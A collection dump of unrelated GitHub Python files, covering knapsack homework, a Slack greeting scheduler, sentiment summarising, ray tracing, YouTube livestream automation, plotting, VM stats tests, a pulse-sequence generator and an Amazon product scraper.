cv2.imshow(\"Testing\", cv2.resize(orig, (1000, 1000)))\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n if len(output) < 1:\n return None\n else:\n return output, i\n\nif __name__ == '__main__':\n # read image\n main(sys.argv[1])\n","repo_name":"AIGamer28100/Design-Project-II","sub_path":"src/textSegmentaion.py","file_name":"textSegmentaion.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72409455041","text":"import queue\n\n# [문제1] 분기한정 가지치기 너비우선검색\nclass Node:\n def __init__(self, level, weight, profit, include):\n self.level = level\n self.weight = weight\n self.profit = profit\n self.include = include\n\ndef kp_BFS():\n global maxProfit\n global bestSet\n global secondMaxProfit\n global secondBestSet\n global nodeCount\n global maxQueue\n\n queueCount = 0\n q = queue.Queue()\n\n v = Node(-1, 0, 0, n * [0])\n q.put(v)\n\n maxQueue += 1\n queueCount += 1\n nodeCount += 1\n\n while (not q.empty()):\n v = q.get()\n u = Node(-1, 0, 0, n * [0])\n\n queueCount -= 1\n nodeCount += 2\n \n u.level = v.level + 1\n u.weight = v.weight + w[u.level]\n u.profit = v.profit + p[u.level]\n u.include = v.include\n u.include[u.level] = 1\n if (u.weight <= W) and (u.profit > maxProfit):\n maxProfit = u.profit\n bestSet = u.include[:]\n if compBound(u) > maxProfit:\n q.put(u)\n queueCount += 1\n\n u = Node(u.level, v.weight, v.profit, v.include[:])\n u.include[u.level] = 0\n if (u.weight <= W) and (u.profit > secondMaxProfit):\n secondMaxProfit = u.profit\n secondBestSet = u.include[:]\n if compBound(u) > secondMaxProfit:\n q.put(u)\n queueCount += 1\n\n if queueCount > maxQueue:\n maxQueue = queueCount\n\ndef compBound(u):\n if u.weight >= W:\n return 0\n else:\n result = u.profit\n j = u.level + 1\n totweight = u.weight\n\n while (j < n) and (totweight 
+ w[j] <= W):\n totweight += w[j]\n result += p[j]\n j += 1\n k = j\n if k < n:\n result += (W - totweight) * p[k] / w[k]\n return result\n\n\nn = 4\nW = 5\np = [30, 36, 18, 10]\nw = [3, 4, 3, 2]\ninclude = [0] * n\nmaxProfit = 0\nbestSet = n * [0]\nsecondMaxProfit = 0\nsecondBestSet = n * [0]\nnodeCount = 0 # 상태공간트리의 �� 노드의 개수\nmaxQueue = 0 # 어느 한순간에 queue에 저장된 데이터 개수의 최댓값\nkp_BFS()\nprint('[문제1]')\nprint(nodeCount)\nprint(maxQueue)\nprint(bestSet, maxProfit)\nprint(secondBestSet, secondMaxProfit)\nprint()\n\n# [문제2] 분기한정 가지치기 최고우선검색\n\nclass Node2:\n def __init__(self, level, weight, profit, bound, include):\n self.level = level\n self.weight = weight\n self.profit = profit\n self.bound = bound\n self.include = include\n\n def __lt__(self, other):\n return self.bound < other.bound\n\ndef kp_Best_FS():\n global maxProfit2\n global bestSet2\n\n pq = queue.PriorityQueue() # min-heap\n v = Node2(-1, 0, 0, 0, [0] * n)\n v.bound = compBound2(v)\n pq.put(v)\n \n while not pq.empty():\n v = pq.get()\n\n if v.bound < maxProfit2:\n level = v.level + 1\n weight = v.weight + w[level]\n profit = v.profit + p[level]\n include = v.include[:]\n u = Node2(level, weight, profit, 0, include)\n u.include[u.level] = 1\n\n if u.weight <= W and u.profit > maxProfit2:\n maxProfit2 = -u.profit\n bestSet2 = u.include[:]\n\n u.bound = compBound2(u)\n if u.bound < maxProfit2:\n pq.put(u)\n \n u = Node2(v.level + 1, v.weight, v.profit, 0, v.include[:])\n u.bound = compBound2(u)\n if u.bound < maxProfit2:\n u.include[u.level] = 0\n pq.put(u)\n \ndef compBound2(u):\n if u.weight >= W:\n return 0\n else:\n result = u.profit\n j = u.level + 1\n totweight = u.weight\n\n while j < n and totweight + w[j] <= W:\n totweight += w[j]\n result += p[j]\n j += 1\n k = j\n if k < n:\n result += (W - totweight) * p[k] / w[k]\n return -result\n\nn = 4\nW = 5\np = [30, 36, 18, 10]\nw = [3, 4, 3, 2]\ninclude = [0] * n\nmaxProfit2 = 0\nbestSet2 = n * [0]\nkp_Best_FS()\nprint('[문제2]')\nprint(bestSet2, -maxProfit2)","repo_name":"hwangjuntae/code","sub_path":"algorithm/al_solution/hw4/hw4+김성우+2021105684.py","file_name":"hw4+김성우+2021105684.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"15737882580","text":"from sched import scheduler\nfrom random import randint\nimport datetime\n\n\ndays_of_week = ['lunes', 'martes', 'miércoles', 'jueves',\n 'viernes', 'sábado', 'domingo']\ngreetings = ['¡Buenos días!', '¡Que tengáis un fantástico día!',\n 'Good morning', 'Que paseis un buen {}', 'Buen {}', 'Buenos días por la mañana']\n\n@scheduler.scheduled_job('cron', day_of_week='mon-fri', hour=8)\ndef morning(**kwargs):\n msg = greetings[randint(0, len(greetings)-1)]\n day = days_of_week[datetime.datetime.today().weekday()]\n msg = msg.format(day)\n\n client = kwargs['client']\n client.rtm_send_message(\"qa_group\", msg)\n","repo_name":"ChemitaContigo/qasimodo","sub_path":"src/sched/morning.py","file_name":"morning.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72844983683","text":"import pandas as pd\r\n\r\n\r\ndef get_sentiment_label(row):\r\n labels = {\r\n 'negative': row.negative_score,\r\n 'neutral': row.neutral_score,\r\n 'positive': row.positive_score\r\n }\r\n\r\n return max(labels, key=labels.get)\r\n\r\n\r\ndef summarize_sentiment(esg_component):\r\n df1 = pd.read_csv(f'sentiment_{esg_components}_guardian_df(1).csv', sep=';', 
index_col=0)\r\n df2 = pd.read_csv(f'sentiment_{esg_components}_df.csv', sep=';', index_col=0)\r\n\r\n df1 = df1[['companyName', 'versionCreated', 'negative_score', 'neutral_score', 'positive_score']]\r\n df2 = df2[['companyCode', 'versionCreated', 'negative_score', 'neutral_score', 'positive_score']]\r\n\r\n df1.columns = df2.columns\r\n df = pd.concat([df1, df2], ignore_index=True)\r\n\r\n df.columns = ['company', 'date', 'negative_score', 'neutral_score', 'positive_score']\r\n\r\n df['year'] = df['date'].apply(lambda date_str: date_str.split('-')[0])\r\n df['month'] = df['date'].apply(lambda date_str: date_str.split('-')[1])\r\n df = df[df['year'].isin(['2020', '2021'])]\r\n df['period'] = df.apply(lambda row: f'{row.year}-{row.month}', axis=1)\r\n\r\n df['label'] = df.apply(get_sentiment_label, axis=1)\r\n\r\n grouping_df = df[['company', 'period', 'label']].value_counts()\r\n grouping_df = grouping_df.unstack(2)\r\n\r\n grouping_df = grouping_df.fillna(0)\r\n grouping_df['pos_perc'] = grouping_df.apply(lambda row: row.positive / sum(row), axis=1)\r\n grouping_df['neg_perc'] = grouping_df.apply(lambda row: row.negative / sum(row), axis=1)\r\n\r\n grouping_df.to_excel(f'news_sentiment_{esg_components}.xlsx')\r\n\r\n\r\nesg_components = ['ceo', 'gov', 'cyb', 'env']\r\n\r\nfor esg_component in esg_components:\r\n summarize_sentiment(esg_components)\r\n","repo_name":"adrian-stepniak/ai-in-esg-competition","sub_path":"sentiment_summary.py","file_name":"sentiment_summary.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72531417281","text":"from .shape import Shape\nfrom .bounding_box import BoundingBox\nfrom .intersections import Intersections\n\nclass Group (Shape):\n __slots__ = ['shapes']\n \n def __init__(self, *args):\n super().__init__()\n self.shapes = list(args)\n for shape in self.shapes:\n shape.parent = self\n \n def intersects_int(self, r):\n if self.bounds().intersects(r):\n hits = []\n for shape in self.shapes:\n xs = shape.intersects(r)\n for i in xs:\n if not i in hits:\n hits.append(i)\n \n return Intersections(*sorted(hits, key=lambda x: x.t))\n return Intersections()\n \n def local_normal_at(self, pt, i):\n raise NotImplementedError\n \n def __len__(self):\n return len(self.shapes)\n \n def bounds(self):\n box = BoundingBox()\n for shape in self.shapes:\n box.add(shape.parent_space_bounds())\n return box\n\n def add(self, s):\n self.shapes.append(s)\n s.parent = self\n\n def contains(self, s):\n return s in self\n \n def __contains__ (self, s):\n return s in self.shapes\n \n def __getitem__ (self, idx):\n return self.shapes[idx]\n\n def partition_children(self):\n left_list = []\n right_list = []\n \n to_remove = []\n \n left, right = self.bounds().split()\n for shape in self.shapes:\n shape_parent_bounds = shape.parent_space_bounds()\n if left.contains(shape_parent_bounds):\n left_list.append(shape)\n to_remove.append(shape)\n if right.contains(shape_parent_bounds):\n right_list.append(shape)\n to_remove.append(shape)\n \n for s in to_remove:\n self.shapes.remove(s)\n\n return left_list, right_list\n \n def make_subgroup (self, *args):\n self.add(Group(*args))\n\n def divide(self, threshold):\n if threshold <= len(self):\n left, right = self.partition_children()\n if len(left):\n self.make_subgroup(*left)\n if len(right):\n self.make_subgroup(*right)\n \n for s in self.shapes:\n if hasattr(s, 'divide'):\n s.divide(threshold)\n\n def __eq__ (self, other):\n return 
isinstance(other, Group) and \\\n _compare_shapes(self.shapes, other.shapes) and \\\n len(self) == len(other)\n \n def __repr__(self):\n return f\"Group({self.shapes})\"\n \n\n def check_hits(self):\n for s in self.shapes:\n s.check_hits()\n\n\ndef _compare_shapes (first, second):\n first_not_second = list(filter(lambda x: x not in first, second))\n second_not_first = list(filter(lambda x: x not in second, first))\n return not bool (first_not_second or second_not_first)\n\n\ndef _hexagon_corner():\n sphere = Sphere()\n sphere = t.ransform = translation(0, 0, -1) * scaling(0.25, 0.25, 0.25)\n \ndef _hexagon_Edge():\n cylinder = Cylinder()\n cylinder.minimum = 0\n cylinder.maximum = 1\n cylinder.transform = translation(0, 0, -1) * \\\n rotation_y(-Math.PI / 6) * \\\n rotation_z(-Math.PI / 2) * \\\n scaling(0.25, 1, 0.25)\n\ndef _hexagon_side():\n side = Group()\n side.add(_hexagon_corner())\n side.add(_hexagon_edge())\n return side\n \ndef hexagon():\n hex = Group()\n for i in range(6):\n side = _hexagon_side()\n side.transform = rotation_y(i * math.pi / 3)\n hex.add(side)\n return hex;","repo_name":"davepkennedy/ray_tracer_challenge_python","sub_path":"rt/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"17571924575","text":"import datetime\r\nimport math\r\nimport youtube\r\nimport json\r\nimport os\r\nimport httplib2\r\nfrom googleapiclient.errors import HttpError\r\n\r\n# Global variables yay\r\nterm_start_date = \"2020-10-11\"\r\nterm = 4\r\n\r\ndays = {\r\n 0 : \"Monday\",\r\n 1 : \"Tuesday\",\r\n 2 : \"Wednesday\",\r\n 3 : \"Thursday\",\r\n 4 : \"Friday\",\r\n 5 : \"Saturday\",\r\n 6 : \"Sunday\"\r\n}\r\n\r\nclass Lesson():\r\n def __init__(self, term, week, subject, day, classtime, teacher):\r\n self._term = term\r\n self._week = week\r\n self._subject = subject\r\n self._day = day\r\n self._classtime = classtime\r\n self._teacher = teacher\r\n \r\n @property\r\n def classtime(self):\r\n return self._classtime\r\n\r\n def message_string(self):\r\n print_time = self._classtime.strftime(\"%I:%M%p\")\r\n return f'{self._subject} {print_time} {self._teacher}'\r\n\r\n # Function to format livestream name \r\n def __str__(self):\r\n print_time = self._classtime.strftime(\"%I:%M%p\")\r\n output = f'T{self._term} | Week {self._week} | {self._subject} {self._day} {print_time} {self._teacher}'\r\n return output\r\n\r\n# Send message to slack\r\ndef send_message(lesson, stream_key, broadcast_id):\r\n string = lesson.message_string() + \"\\n\" + stream_key + \"\\n \\n\" + \"youtube.com/watch?v=\" + broadcast_id\r\n\r\n url = 'insert url here'\r\n bot_message = {\r\n 'text' : string\r\n }\r\n\r\n message_headers = {'Content-Type': 'application/json; charset=UTF-8'}\r\n\r\n http_obj = httplib2.Http()\r\n response = http_obj.request(\r\n uri=url,\r\n method='POST',\r\n headers=message_headers,\r\n body=json.dumps(bot_message),\r\n )\r\n\r\n print(\"Message sent\\n\")\r\n\r\n\r\n# Youtube authentication yay\r\n#youtube_auth = youtube.get_authenticated_service()\r\n\r\n# Grab the date and figure out what day and week it is\r\nto_day = datetime.date.today()\r\nweek_day = days.get(to_day.weekday())\r\nterm_start = datetime.datetime.strptime(term_start_date, \"%Y-%m-%d\").date()\r\nweek_num = math.ceil((to_day - term_start).days / 7) \r\n\r\n# Format the file name based on the year and term\r\nfilename = str(term_start.year) + \"t\" + str(term) + \".txt\"\r\n\r\n# Search 
through lesson.txt for lessons that are on and save the information to a class\r\nwith open(filename, \"r\") as f:\r\n for line in f:\r\n if week_day in line: \r\n subject, day, classtime, teacher = line.split(',')\r\n\r\n # Converting the class time to a datetime object \r\n hour, minute = map(int , classtime.split(':'))\r\n classtime = datetime.time(hour, minute, 0)\r\n classtime = datetime.datetime.combine(datetime.date.today(), classtime)\r\n\r\n lesson = Lesson(term, week_num, subject, day, classtime, teacher)\r\n print(lesson)\r\n\r\n # Do the youtube things\r\n try:\r\n broadcast_id = youtube.insert_broadcast(youtube_auth, lesson)\r\n youtube.update_broadcast(broadcast_id, youtube_auth, lesson)\r\n (stream_id, stream_key) = youtube.insert_stream(youtube_auth, lesson)\r\n print(stream_id, stream_key)\r\n youtube.bind_broadcast(youtube_auth, broadcast_id, stream_id)\r\n except HttpError as e:\r\n print (f\"An HTTP error {e.resp.status} occurred:\\n {e.content}\")\r\n \r\n send_message(lesson, stream_key, broadcast_id)\r\n","repo_name":"agentdisguise/automate_livestream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"13414846999","text":"#!/usr/bin/env python\n# coding: utf-8\n# Author : Swetabh\n\n# In[1]: Imports\n\nimport pandas as pd\nfrom pandas.plotting import register_matplotlib_converters\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport matplotlib.dates as mdates\nimport datetime as dt\nfrom dateutil.relativedelta import relativedelta\n\nregister_matplotlib_converters()\n\n# In[2]: CSV Operations\n\n_csv = pd.read_csv('result.csv', index_col=False)\ndate = _csv['Date'].tolist()\ntotal_images = _csv['Proxies Identified'].tolist()\nprecision = _csv['Precision'].tolist()\nrecall = _csv['Recall'].tolist()\n\n\n# In[3]: Plot\n\n\ndef _plot(time_range=\"Last Week\", _end=None):\n fig, ax1 = plt.subplots()\n ax2 = ax1.twinx()\n _date = [datetime.strptime(d, '%d/%m/%Y') for d in date]\n ax1.plot_date(_date, total_images, 'r-', label='Total Images')\n ax2.plot_date(_date, recall, 'g-', label='Recall')\n ax2.plot_date(_date, precision, 'b-', label='Precision')\n ax1.set_ylim([25, 80])\n ax2.set_ylim([0.3, 1.0])\n ax1.set_ylabel('Total Images Processed', color='black')\n ax2.set_ylabel('Precision | Recall', color='black')\n if _end is not None:\n fig.suptitle('Plot for Date Range: '+time_range+' to '+_end)\n else:\n fig.suptitle('Plot for '+time_range)\n fig.legend(loc='upper right')\n x_dates = mdates.DateFormatter('%d/%m/%Y')\n ax1.xaxis.set_major_formatter(x_dates)\n plt.gcf().autofmt_xdate()\n if _end is not None:\n start_date = dt.datetime.strptime(time_range, '%d/%m/%Y')\n end_date = dt.datetime.strptime(_end, '%d/%m/%Y')\n ax1.set_xlim(start_date, end_date)\n plt.show()\n\n else:\n start_date, end_date = _custom_date(time_range)\n ax1.set_xlim(start_date, end_date)\n plt.show()\n\n\ndef _custom_date(time_range):\n today = dt.date.today()\n start = ''\n end = ''\n # if time_range == 'last week' or time_range == 'Last Week':\n # start_date = today - relativedelta(days=7)\n # end_date = today - relativedelta(days=1)\n # return start_date, end_date\n if time_range == 'last month' or time_range == 'Last Month':\n start = today - relativedelta(months=1)\n start_date = dt.date(start.year, start.month, 1)\n end_date = dt.date(today.year, today.month, 1) - relativedelta(days=1)\n return start_date, end_date\n elif 
time_range == 'this month' or time_range == 'This Month':\n start_date = today - relativedelta(days=(today.day - 1))\n end_date = today - relativedelta(days=1)\n return start_date, end_date\n else:\n start_date = today - relativedelta(days=7)\n end_date = today - relativedelta(days=1)\n return start_date, end_date\n\n\n# In[5]: Main Function\n\n# Default plot : Last Week\nif __name__ == '__main__':\n _plot()\n","repo_name":"swetabhmukherjee/smarteye-metrics","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"73044398403","text":"import unittest\nimport mock\nfrom agent import collector\nfrom agent import vm\nimport libvirt\n\n\nclass TestVMStatsCollector(unittest.TestCase):\n\n @mock.patch.object(libvirt.virConnect, 'lookupByUUIDString')\n def test_recordStats(self, mock_lookup):\n vm_factory = vm.VMFactory()\n vm_info = {\n 'uuid': \"6717da86-fc51-474d-92fe-a76380c27c62\",\n 'name': \"instance-000003f9\"\n }\n vm_factory.addVM(0, vm_info)\n vm_storage = mock.MagicMock()\n mock_save = vm_storage.saveStatsInfo\n vm_collector = collector.VMStatsCollector(vm_factory, vm_storage)\n vm_collector.recordStats()\n self.assertTrue(mock_lookup.called)\n self.assertTrue(mock_save.called)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"openeuler-mirror/VMAnalyzer","sub_path":"tests/unit/agent/test_collector.py","file_name":"test_collector.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"11942260295","text":"# model of client for testing purpouses\nimport struct \nimport eventlet\nimport json\nimport sys\nimport uuid\n\nfrom eventlet.green import socket\n\nimport scp.protocols as prot\nimport scp.protobufs.sfk_pb2 as SfkPb\nfrom scp.logger import LOGGER\nfrom scp.common import str_uuid\n\nfrom sfkmodel import serialize_int, SfkModel\n\nADDRESS = ('127.0.0.1', 6008)\nappids = ['abcdef00', 'abcdef11']\n\nID = 'A'\nAPPID_NO = 0\n\n\nclass ClientModel(SfkModel):\n \n NATIVE_PACKET = prot.Spif2Packet\n \n def __init__(self, appid=''):\n super(ClientModel, self).__init__()\n self.appid = appid\n self.sock = socket.socket()\n\n\n def _make_session_packet(self):\n packet = prot.Spif2Packet()\n magic = prot.Spif2Packet.MAGIC\n\n # make protobuf field\n pb = SfkPb.Msg()\n pb.mtype = pb.SESSION\n pb.session.fid = 273 # just a placeholder, hmm.. 
\n # let it be an absolute temperature zero\n params = json.dumps({'sfk-url':'tcp://127.0.0.1:6009/' + self.appid})\n pb.session.params = params\n protobuf = pb.SerializeToString()\n\n data = ''\n\n buf = (serialize_int(magic) + \n serialize_int(len(protobuf)) +\n serialize_int(len(data)) + \n protobuf + \n data)\n\n packet.set_raw_packet(buf)\n return packet\n\n def _make_message_packet(self, n):\n pb = SfkPb.Msg()\n pb.mtype = pb.DATA\n pb.data.content_type = \"simple\"\n pb.data.payload = \"test\"\n protobuf = pb.SerializeToString()\n\n data = ID + (\"0000\" + str(n))[-4:]\n return prot.Spif2Packet(protobuf=protobuf, data=data)\n\n\n def connect(self, addr):\n super(ClientModel, self).connect(addr) \n \n\n def send_packet(self, packet):\n super(ClientModel, self).send_packet(packet)\n\n\n def recved_packets_processor(self):\n try:\n while True:\n packet = self.queue_recv.get()\n LOGGER.info(\"recved: %s\" % packet.bindata)\n except Exception as e:\n LOGGER.error(\"recved_packets_processor: %s\" % str(e))\n\n\n def test(self, interval, n):\n for i in range(n):\n eventlet.sleep(interval)\n packet = self._make_message_packet(i)\n self.queue_send.put(packet)\n\n\nif __name__ == '__main__':\n\n try:\n ID = sys.argv[1]\n except Exception:\n LOGGER.info(\"Default value for ID(%s) will be used\" % ID)\n\n try:\n APPID_NO = int(sys.argv[2])\n except Exception:\n LOGGER.info(\"Default value for APPID_NO(%d) will be used\" % APPID_NO)\n\n client = ClientModel(appid=appids[APPID_NO])\n client.connect(ADDRESS)\n client.send_packet(client._make_session_packet())\n eventlet.spawn_n(client.recver)\n eventlet.spawn_n(client.sender)\n eventlet.spawn_n(client.recved_packets_processor)\n\n client.test(2, 5)\n \n eventlet.event.Event().wait()\n","repo_name":"qwdm/scp","sub_path":"tests/clientmodel.py","file_name":"clientmodel.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"5120952991","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"\nFusionner des sous-modèles dans un même sous-modèle\nPour l'instant, seules les lois de frottement sont suffixées\n\"\"\"\nimport sys\n\nfrom crue10.etude import Etude\nfrom crue10.sous_modele import SousModele\nfrom crue10.utils import ExceptionCrue10, logger\nfrom crue10.utils.cli_parser import MyArgParse\n\n\ndef crue10_merge_sous_modeles(args):\n if len(args.etu_path_list) != len(args.sm_name_list) != len(args.suffix_list):\n raise ExceptionCrue10(\"Les arguments `etu_path_list`, `suffix_list` \"\n \"et `sm_name_list` n'ont pas la même longueur !\")\n if len(args.etu_path_list) < 2:\n raise ExceptionCrue10(\"Il faut au moins 2 sous-modèles pour faire la fusion !\")\n\n merged_sous_modele = None\n for etu_path, sm_name, suffix in zip(args.etu_path_list, args.sm_name_list, args.suffix_list):\n etude = Etude(etu_path)\n sous_modele = etude.get_sous_modele(sm_name)\n sous_modele.read_all()\n logger.info(sous_modele)\n\n if merged_sous_modele is None:\n merged_sous_modele = SousModele(sous_modele.id, files=sous_modele.files,\n version_grammaire=sous_modele.version_grammaire)\n merged_sous_modele.ajouter_emh_depuis_sous_modele(sous_modele, suffix)\n\n logger.info(\"~> Sous-modèle fusionné:\")\n logger.info(merged_sous_modele)\n merged_sous_modele.write_all(args.output_folder, folder_config='Config')\n\n\nparser = MyArgParse(description=__doc__)\nparser_submodels = parser.add_argument_group(\"Choix des sous-modèles à 
fusionner\")\nparser_submodels.add_argument('--etu_path_list', help=\"liste des chemins vers des fichiers etu.xml\", nargs='+',\n required=True)\nparser_submodels.add_argument('--sm_name_list', help=\"liste des noms des sous-modèles\", nargs='+', required=True)\nparser_submodels.add_argument('--suffix_list', help=\"liste des suffixes\", nargs='+', required=True)\nparser.add_argument('output_folder', help=\"nom du dossier de sortie\")\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n try:\n crue10_merge_sous_modeles(args)\n except ExceptionCrue10 as e:\n logger.critical(e)\n sys.exit(1)\n","repo_name":"CNR-Engineering/Crue10_tools","sub_path":"cli/crue10_merge_submodels.py","file_name":"crue10_merge_submodels.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"98"} +{"seq_id":"32100194935","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 23 17:39:27 2019\n\n@author: mccambria\n\"\"\"\n\nfrom pulsestreamer import Sequence\nfrom pulsestreamer import OutputState\nimport numpy\n\nLOW = 0\nHIGH = 1\n\n\ndef get_seq(pulser_wiring, args):\n\n # %% Parse wiring and args\n\n # The first 9 args are ns durations and we need them as int64s\n durations = args[0:4]\n durations = [numpy.int64(el) for el in durations]\n\n # Unpack the durations\n polarization_dur, reference_wait_dur, gate_dur, aom_delay = durations\n \n # Buffer turning off the AOM so that we're sure the AOM was fully on for\n # the duration of the gate. This also separates the gate falling edge from\n # the clock rising edge - if these are simultaneous the tagger can get\n # confused\n aom_switch_buffer_dur = 100\n\n # Get the APD indices\n apd_index = args[4]\n\n # Get what we need out of the wiring dictionary\n key = 'do_apd_{}_gate'.format(apd_index)\n pulser_do_apd_gate = pulser_wiring[key]\n pulser_do_aom = pulser_wiring['do_532_aom']\n\n # %% Couple calculated values\n\n # The period is independent of the particular tau, but it must be long\n # enough to accomodate the longest tau\n period = aom_delay + polarization_dur + reference_wait_dur + gate_dur\n\n # %% Define the sequence\n\n seq = Sequence()\n\n # APD gating\n train = [(aom_delay + polarization_dur + reference_wait_dur, LOW),\n (gate_dur, HIGH),\n (aom_switch_buffer_dur, LOW)]\n seq.setDigital(pulser_do_apd_gate, train)\n\n # AOM\n# train = [(polarization_dur, HIGH),\n# (reference_wait_dur, LOW),\n# (gate_dur + aom_switch_buffer_dur, HIGH),\n# (aom_delay, LOW)]\n train = [(period, HIGH)] # Always on to completely negate transient brightness\n seq.setDigital(pulser_do_aom, train)\n\n final_digital = [pulser_wiring['do_532_aom'],\n pulser_wiring['do_sample_clock']]\n final = OutputState(final_digital, 0.0, 0.0)\n return seq, final, [period]\n\n\nif __name__ == '__main__':\n wiring = {'do_532_aom': 0, 'do_apd_0_gate': 1}\n args = [3 * 10**3, 2 * 10**3, 320, 0, 0]\n seq = get_seq(wiring, args)[0]\n seq.plot()\n","repo_name":"mccambria/dioptric","sub_path":"servers/timing/sequencelibrary/pulse_gen_SWAB_82/count_rate_versus_readout_dur.py","file_name":"count_rate_versus_readout_dur.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"} +{"seq_id":"41139412534","text":"from bs4 import BeautifulSoup\nimport requests\nimport random as rand\n\n# Function to extract Product Title\ndef get_title(soup):\n\t\n\ttry:\n\t\t# Outer Tag Object\n\t\ttitle = soup.find(\"span\", 
attrs={\"id\":'productTitle'})\n\n\t\t# Inner NavigatableString Object\n\t\ttitle_value = title.string \n\n\t\t# Title as a string value\n\t\ttitle_string = title_value.strip()\n\n\t\t# # Printing types of values for efficient understanding\n\t\t# print(type(title))\n\t\t# print(type(title_value))\n\t\t# print(type(title_string))\n\t\t# print()\n\n\texcept AttributeError:\n\t\ttitle_string = \"\"\t\n\n\treturn title_string\n\n# Function to extract Product Price\ndef get_price(soup):\n\n\ttry:\n\t\tprice = soup.find(\"span\", attrs={'id':'priceblock_ourprice'}).string.strip()\n\n\texcept AttributeError:\n\n\t\ttry:\n\t\t\t# If there is some deal price\n\t\t\tprice = soup.find(\"span\", attrs={'id':'priceblock_dealprice'}).string.strip()\n\n\t\texcept:\t\t\n\t\t\tprice = \"\"\t\n\n\treturn price\n\n# Function to extract Product Rating\ndef get_rating(soup):\n\n\ttry:\n\t\trating = soup.find(\"i\", attrs={'class':'a-icon a-icon-star a-star-4-5'}).string.strip()\n\t\t\n\texcept AttributeError:\n\t\t\n\t\ttry:\n\t\t\trating = soup.find(\"span\", attrs={'class':'a-icon-alt'}).string.strip()\n\t\texcept:\n\t\t\trating = \"\"\t\n\n\treturn rating\n\n# Function to extract Number of User Reviews\ndef get_review_count(soup):\n\ttry:\n\t\treview_count = soup.find(\"span\", attrs={'id':'acrCustomerReviewText'}).string.strip()\n\t\t\n\texcept AttributeError:\n\t\treview_count = \"\"\t\n\n\treturn review_count\n\n# Function to extract Availability Status\ndef get_availability(soup):\n\ttry:\n\t\tavailable = soup.find(\"div\", attrs={'id':'availability'})\n\t\tavailable = available.find(\"span\").string.strip()\n\n\texcept AttributeError:\n\t\tavailable = \"Not Available\"\t\n\n\treturn available\t\n\n\nif __name__ == '__main__':\n\n\t# Headers for request\n rotated_headers = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15']\n HEADERS = ({'User-Agent':\n rotated_headers[rand.randrange(0, len(rotated_headers))],\n\t 'Accept-Language': 'en-US'})\n\n\t# The webpage URL\n URL = \"https://www.amazon.com/Cancelling-Headphones-Lightweight-Srhythm-Bluetooth/dp/B083S6Q8VK/ref=sr_1_2_sspa?c=ts&keywords=Over-Ear+Headphones&qid=1688949354&s=aht&sr=1-2-spons&ts_id=12097479011&sp_csd=d2lkZ2V0TmFtZT1zcF9hdGY&psc=1\"\n\t\n\t# HTTP Request\n webpage = requests.get(URL, headers=HEADERS)\n print(webpage)\n\n\t# Soup Object containing all data\n soup = BeautifulSoup(webpage.content, \"lxml\")\n print(soup)\n \n \"\"\"\n\t# Fetch links as List of Tag Objects\n links = soup.find_all(\"a\", attrs={'class':'a-link-normal s-no-outline'})\n\n\t# Store the links\n links_list = []\n\n\t# Loop for extracting links from Tag Objects\n for link in links:\n links_list.append(link.get('href'))\n\n\t# Loop for extracting product details from each link \n for link in links_list:\n\n 
